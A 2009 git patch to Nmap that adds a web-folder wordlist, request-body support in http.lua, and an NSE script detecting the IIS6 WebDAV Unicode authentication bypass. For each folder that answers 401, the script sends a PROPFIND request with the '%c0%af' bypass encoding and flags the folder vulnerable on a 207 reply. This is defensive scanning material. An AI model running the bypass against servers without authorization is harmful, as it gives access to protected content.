From c213cc97b1a31c04262756f07fa9345f52829eb4 Mon Sep 17 00:00:00 2001 From: ron Date: Tue, 19 May 2009 20:56:07 +0000 Subject: [PATCH] Added an initial WebDAV vulnerability-detection attempt for testing --- nselib/data/folders.lst | 856 +++++++++++++++++++++++++ nselib/http.lua | 8 + scripts/http-webdav-unicode-bypass.nse | 167 +++++ 3 files changed, 1031 insertions(+) create mode 100644 nselib/data/folders.lst create mode 100644 scripts/http-webdav-unicode-bypass.nse diff --git a/nselib/data/folders.lst b/nselib/data/folders.lst new file mode 100644 index 000000000..5afbc429a --- /dev/null +++ b/nselib/data/folders.lst @@ -0,0 +1,856 @@ + +1 +10 +2 +3 +4 +5 +6 +7 +8 +9 +Admin_files +AdvWebAdmin +Agent +Agents +Album +CS +CVS +DMR +DocuColor +GXApp +HB +HBTemplates +I +IBMWebAS +JBookIt +Msword +NSearch +NetDynamic +NetDynamics +News +PDG_Cart +ROADS +Readme +ScriptLibrary +SilverStream +StoreDB +ToDo +WS_FTP +WebBank +WebCalendar +WebShop +WebTrend +Web_store +XSL +_pages +a +acceso +access +accesswatch +acciones +account +accounting +active +activex +adm +admcgi +admentor +admin +admin-bak +admin-old +admin.back +adminWeb +admin_ +administration +administrator +adminuser +adminweb +admisapi +agentes +allow +analog +anthill +apache +app +appl +applets +application +applications +applmgr +apply +apps +appsec +ar +archive +archives +asa +asp +atc +aut +auth +authadmin +author +authors +aw +ayuda +b +b2-include +back +backend +backup +backups +bad +bak +banca +banco +bank +banner +banner01 +banners +bar +batch +bb-dnbd +bbv +bdata +bdatos +beta +billpay +bin +binaries +binary +boadmin +boot +bottom +browse +browser +bsd +btauxdir +bug +bugs +bugzilla +buy +buynow +c +cache +cache-stats +cached +caja +card +cards +cart +cash +caspsamp +catalog +cbi-bin +ccard +ccards +cd +cd-cgi +cdrom +ce_html +cert +certificado +certificate +cfappman +cfdocs +cfide +cgi +cgi-auth +cgi-bin +cgi-bin2 +cgi-csc +cgi-lib +cgi-local +cgi-scripts +cgi-shl +cgi-shop +cgi-sys +cgi-weddico +cgi-win +cgibin +cgilib +cgis +cgiscripts +cgiwin +class +classes +client +cliente +clientes +clients +cm +cmsample +cobalt-images +code +com +comments +common +communicator +comp +company +compra +compras +compressed +conecta +conf +config +configs +configure +connect +console +contact +contacts +content +controlpanel +core +corp +correo +counter +credit +cron +crons +crypto +csr +css +cuenta +cuentas +currency +cust +custom +customer +customers +cvsweb +cybercash +d +darkportal +dat +data +database +databases +datafiles +dato +datos +db +dbase +dcforum +ddreport +ddrint +debug +debugs +default +delete +demo +demoauct +demomall +demos +demouser +deny +derived +design +dev +devel +development +dir +directories +directory +directorymanager +dl +dm +dms +dms0 +dmsdump +doc +doc-html +doc1 +docs +docs1 +document +documentation +documents +down +download +downloads +dump +durep +e +easylog +eforum +ejemplo +ejemplos +email +emailclass +employees +empoyees +empris +enter +envia +enviamail +error +errors +es +estmt +etc +example +examples +exc +excel +exchange +exe +exec +exit +export +external +extranet +f +failure +fbsd +fcgi +fcgi-bin +features +file +filemanager +files +find +flash +foldoc +foo +foobar +form +form-totaller +forms +formsmgr +forum +forums +foto +fotos +fpadmin +fpclass +fpdb +fpe +fpsample +frames +framesets +frontpage +ftp +ftproot +fun +func +function +functions +g +general +gfx +gif +gifs +global +globals +good +graphics +grocery +guest +guestbook +guests +h +help +helpdesk +hidden +hide +hit_tracker +hitmatic +hlstats +home +host +hosted +hosting +hostingcontroller +ht +htbin +htdocs +htm +html +http +https +hyperstat +ibank +ibill +icons +idea +ideas +iisadmin +iissamples +image +imagenes +imagery +images +img +imp +import +impreso +in +inc +include +includes +incoming +index +inet +inf +info +information +ingresa +ingreso +install +internal +internet +intranet +inventory +invitado +isapi +j +japidoc +java +javascript +javasdk +javatest +jave +jdbc +job +jrun +js +jsa +jscript +jserv +jslib +jsp +junk +k +kiva +known +l +labs +lcgi +lib +libraries +library +libro +license +licenses +links +linux +loader +local +location +locations +log +logfile +logfiles +logg +logger +logging +login +logon +logout +logs +lost+found +m +mail +mail_log_files +mailman +mailroot +makefile +mall_log_files +man +manage +management +manager +manual +map +maps +marketing +mem +mem_bin +member +members +message +messaging +metacart +microsoft +misc +mkstats +mod +module +modules +movimientos +mqseries +ms +msfpe +msql +my +mysql +mysql_admin +n +name +names +ncadmin +nchelp +ncsample +net +netbasic +netcat +netmagstats +netscape +netshare +nettracker +network +new +news +nextgeneration +nl +notes +noticias +o +objects +odbc +old +old_files +oldfiles +oprocmgr-service +oprocmgr-status +oracle +oradata +order +orders +os +out +outgoing +owners +p +page +pages +partner +partners +passport +password +passwords +path +payment +payments +pccsmysqladm +perl +perl5 +personal +pforum +phorum +php +phpBB +phpMyAdmin +phpmyadmin +phpPhotoAlbum +phpSecurePages +php_classes +phpclassifieds +phpimageview +phpnuke +phpprojekt +pics +pictures +pike +piranha +pls +plsql +poll +polls +portal +portals +postgres +ppwb +printers +priv +privacy +privado +private +prod +protected +proxy +prueba +pruebas +prv +pub +public +publica +publicar +publico +publish +purchase +purchases +pw +python +q +r +random_banner +rdp +register +registered +registry +remote +remove +report +reports +reseller +restricted +retail +reveal +reviews +robot +robots +root +rsrc +ruby +s +sales +sample +samples +save +script +scripts +search +search-ui +sec +secret +secure +secured +security +sell +server +server-info +server-status +server_stats +servers +serverstats +service +services +servicio +servicios +servlet +servlets +session +setup +share +shared +sharedtemplates +shell-cgi +shipping +shop +shopper +show +site +siteadmin +sitemgr +siteminder +siteminderagent +sites +siteserver +sitestats +siteupdate +smreports +smreportsviewer +soap +soapdocs +software +solaris +source +sql +squid +src +srchadm +ssi +ssl +sslkeys +staff +stat +state +statistic +statistics +stats +stats-bin-p +stats_old +status +storage +store +storemgr +stronghold-info +stronghold-status +stuff +style +styles +stylesheet +stylesheets +subir +sun +super_stats +supplier +suppliers +supply +support +supporter +sys +sysadmin +sysbackup +system +systems +t +tar +target +tarjetas +te_html +tech +technote +temp +template +templates +temporal +test +test-cgi +testing +tests +testweb +themes +ticket +tickets +tip +tips +tmp +tool +tools +top +tpv +trabajo +track +tracking +transfer +transito +transpolar +tree +trees +trick +tricks +u +u02 +unix +unknown +updates +upload +uploads +us +usage +user +userdb +users +usr +ustats +usuario +usuarios +util +utils +v +vendor +vfs +vti_bin +vti_bot +vti_log +vti_pvt +vti_shm +vti_txt +w +w-agora +w2000 +w2k +w3perl +way-board +web +web-inf +web800fo +webAdmin +webDB +webMathematica +web_usage +webaccess +webadmin +webalizer +webapps +webboard +webcart +webcart-lite +webdata +webdav +webdb +webimages +webimages2 +weblog +weblogs +webmaster +webmaster_logs +webpub +webpub-ui +webreports +webreps +webshare +website +webstat +webstats +webtrace +webtrends +win +win2k +window +windows +word +work +world +wsdocs +wstats +wusage +www +www-sql +www0 +www2 +www3 +www4 +wwwjoin +wwwlog +wwwrooot +wwwstat +wwwstats +x +xGB +xml +xtemp +y +z +zb41 +zip +zipfiles +winnt +secure +protected +cgi-bin +j2ee +j2ee/examples +j2ee/examples/jsp +ojspdemos +pls +pls/sample +pls/sample/admin +pls/sample/admin_ +pls/sample/admin_/help +recycler +deleted +tmp +intranet +network +AlbumArt +AlbumArt_ +My Shared Folder +fileadmin +webadmin +content.ie5 diff --git a/nselib/http.lua b/nselib/http.lua index 3df0086ce..fd9b9f9bb 100644 --- a/nselib/http.lua +++ b/nselib/http.lua @@ -135,6 +135,7 @@ end -- @param options A table of options. It may have any of these fields: -- * timeout: A timeout used for socket operations. -- * header: A table containing additional headers to be used for the request. +-- * content: The content of the message (content-length will be added -- set header['Content-Length'] to override) request = function( host, port, data, options ) options = options or {} @@ -158,8 +159,15 @@ request = function( host, port, data, options ) for key, value in pairs(options.header or {}) do data = data .. key .. ": " .. value .. "\r\n" end + if(options.content ~= nil and options.header['Content-Length'] == nil) then + data = data .. "Content-Length: " .. string.len(options.content) .. "\r\n" + end data = data .. "\r\n" + if(options.content ~= nil) then + data = data .. options.content + end + local result = {status=nil,["status-line"]=nil,header={},body=""} local socket = nmap.new_socket() local default_timeout = {} diff --git a/scripts/http-webdav-unicode-bypass.nse b/scripts/http-webdav-unicode-bypass.nse new file mode 100644 index 000000000..0665289a2 --- /dev/null +++ b/scripts/http-webdav-unicode-bypass.nse @@ -0,0 +1,167 @@ +description = [[ +This module is based on Metasplit's auxiliary module, modules/auxiliary/scanner/http/wmap_dir_webdav_unicode_bypass.rb. +It attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability +appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, +Digest or NTLM authentication. + +A list of well known folders is used (almost 900) by default. Each one is checked, and if returns an authentication +request (401), another attempt is tried with the malicious encoding. If that attempt returns a successful result (207), +the folder is marked as vulnerable. + +As of now, it takes about 13 seconds for me to scan a local server for every folder. +]] + +--- +-- @usage +-- nmap --script smb-enum-users.nse -p445 +-- +-- @output +-- 80/tcp open http syn-ack +-- |_ http-webdav-unicode-bypass: Vulnerable folders discovered: /secret, /webdav +-- +-- @args webdavfolder Selects a single folder to use, instead of using a built-in list +-- @args folderdb The filename of an alternate list of folders. +-- @args basefolder The folder to start in; eg, "/web" will try "/web/xxx" +----------------------------------------------------------------------- + +author = "Ron Bowes " +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"discovery"} + +require "http" +require "nsedebug" +require "shortport" + +portrule = shortport.port_or_service({80, 8080}, "http") + +---Enumeration for results +local enum_results = +{ + VULNERABLE = 1, + NOT_VULNERABLE = 2, + UNKNOWN = 3 +} + +---Sends a PROPFIND request to the given host, and for the given folder. Returns a table reprenting a response. +local function get_response(host, port, folder) + local webdav_req = '' + + local mod_options = { + header = { + Host = host.ip, + Connection = "close", + ["User-Agent"] = "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)", + ["Content-Type"] = "application/xml", + }, + content = webdav_req + } + + return http.request(host, port, "PROPFIND " .. folder .. " HTTP/1.1\r\n", mod_options) +end + +---Check a single folder on a single host for the vulnerability. Returns one of the enum_results codes. +local function go_single(host, port, folder) + local response + + response = get_response(host, port, folder) + if(response.status == 401) then + local vuln_response + + stdnse.print_debug(1, "http-webdav-unicode-bypass: Found protected folder (401): %s", folder) + + vuln_response = get_response(host, port, folder .. "%c0%af") + if(vuln_response.status == 207) then + stdnse.print_debug(1, "http-webdav-unicode-bypass: Folder seems vulnerable: %s", folder) + return enum_results.VULNERABLE + else + stdnse.print_debug(2, "http-webdav-unicode-bypass: Folder not vulnerable: %s", folder) + return enum_results.NOT_VULNERABLE + end + else + stdnse.print_debug(3, "http-webdav-unicode-bypass: Not a protected folder (%s): %s", response['status-line'], folder) + return enum_results.UNKNOWN + end +end + +---Checks a list of possible folders for the vulnerability. Returns a list of vulnerable folders. +local function go(host, port) + local status, folder + local results = {} + local is_vulnerable = true + + + local folder_file + if(nmap.registry.args.folderdb ~= nil) then + folder_file = nmap.fetchfile(nmap.registry.args.folderdb) + else + folder_file = nmap.fetchfile('nselib/data/folders.lst') + end + + if(folder_file == nil) then + return false, "Couldn't find folders.lse (should be in nselib/data)" + end + + local file = io.open(folder_file, "r") + if not file then + return false, "Couldn't find folders.lse (should be in nselib/data)" + end + + while true do + local result + local line = file:read() + if not line then + break + end + + if(nmap.registry.args.basefolder ~= nil) then + line = "/" .. nmap.registry.args.basefolder .. "/" .. line + else + line = "/" .. line + end + + result = go_single(host, port, line) + if(result == enum_results.VULNERABLE) then + results[#results + 1] = line + elseif(result == enum_results.NOT_VULNERABLE) then + is_vulnerable = false + else + end + end + + file:close() + + return true, results, is_vulnerable +end + +action = function(host, port) + if(nmap.registry.args.webdavfolder ~= nil) then + local folder = nmap.registry.args.webdavfolder + local result = go_single(host, port, "/" .. folder) + + if(result == enum_results.VULNERABLE) then + return string.format("Folder is vulnerable: %s", folder) + elseif(result == enum_results.NOT_VULNERABLE) then + return string.format("Folder is NOT vulnerable: %s", folder) + else + return string.format("Could not determine vulnerability of folder: %s", folder) + end + + else + local status, results, is_vulnerable = go(host, port) + + if(status == false) then + return "ERROR: " .. results + else + if(#results == 0) then + if(is_vulnerable == false) then + return "Server does not appear to be vulnerable." + else + return "No vulnerable folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=" + end + else + return "Vulnerable folders discovered: " .. stdnse.strjoin(", ", results) + end + end + end +end +